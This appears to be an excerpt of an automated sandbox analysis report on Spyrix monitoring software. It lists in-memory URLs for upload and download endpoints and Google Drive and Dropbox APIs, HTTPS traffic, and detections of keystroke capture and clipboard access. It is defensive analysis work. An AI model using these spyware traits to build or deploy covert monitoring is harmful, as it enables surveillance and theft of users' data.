Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/p
Source: qrl.exe, qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions.e
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions//swtb-
Source: qrl.exe, 00000047.00000002.2582806090.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2583023321.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607477587.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615286703.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658177184.0000000000C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsG
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsOMEPATH-
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionseDrive
Source: spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsin
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsive#
Source: qrl.exe, 00000047.00000002.2583202617.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000003.2578411599.00000000010FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsll
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsta=C:
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertl
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertlS
Source: qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu
Source: qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu7
Source: qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuuV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.phpy
Source: timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.Z
Source: [space]= .tmp, 00000016.00000002.2471948542.0000000006885000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyO/
Source: spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/
Source: tasklist.exe, 00000057.00000002.2660761706.000000000324F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/C
Source: spmm.exe, 0000004D.00000002.2677681526.0000000002200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download
Source: WMIC.exe, 0000001E.00000002.1940760617.000000000094C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.e5
Source: WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944743593.000001F03FF67000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944788946.000001F0401D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729BA3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166110001.0000022729B80000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402235208.0000000003268000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000036.00000002.2410129967.0000000003270000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000179E000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2731323017.0000000003410000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2421738724.0000000003050000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, chcp.com, 0000003C.00000002.2422081708.0000000003110000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624261203.0000000004E60000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2513844325.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2514115378.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000041.00000002.2463413036.0000000002D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&bd
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&s
Source: wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeG
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJs5
Source: tasklist.exe, 00000059.00000002.2667523224.0000000000450000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000059.00000002.2667760128.0000000000570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: WMIC.exe, 0000001E.00000003.1940599499.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000002.1941048881.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeN
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeXsC
Source: WMIC.exe, 0000001E.00000002.1940760617.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exec
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: WMIC.exe, 0000001A.00000002.1922338845.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exev
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/f
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/ff
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/about
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.spyrix.com
Source: spkl.exe, 00000038.00000003.2422306843.00000000044CC000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2691175840.0000000000915000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfk
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.com/purchase.php?prg=sfkq
Source: is-1I8EP.tmp.22.dr	String found in binary or memory: https://www.spyrix.com/spyrix-personal-monitor.php
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.spyrix.come

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.170:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.114.14.168:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.8:49725 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376312 OpenClipboard,

56_2_03376312

Contains functionality to modify clipboard data

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376342 SetClipboardData,

56_2_03376342

Contains functionality to retrieve information about pressed keystrokes

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_03376292 GetAsyncKeyState,

56_2_03376292

Installs a raw input device (often for capturing keystrokes)

Source: spkl.exe, 00000038.00000003.2463770812.0000000004DAE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_00294fb9-0

System Summary

PE file has nameless sections

Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-9U2JI.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
Source: is-719F1.tmp.22.dr	Static PE information: section name:
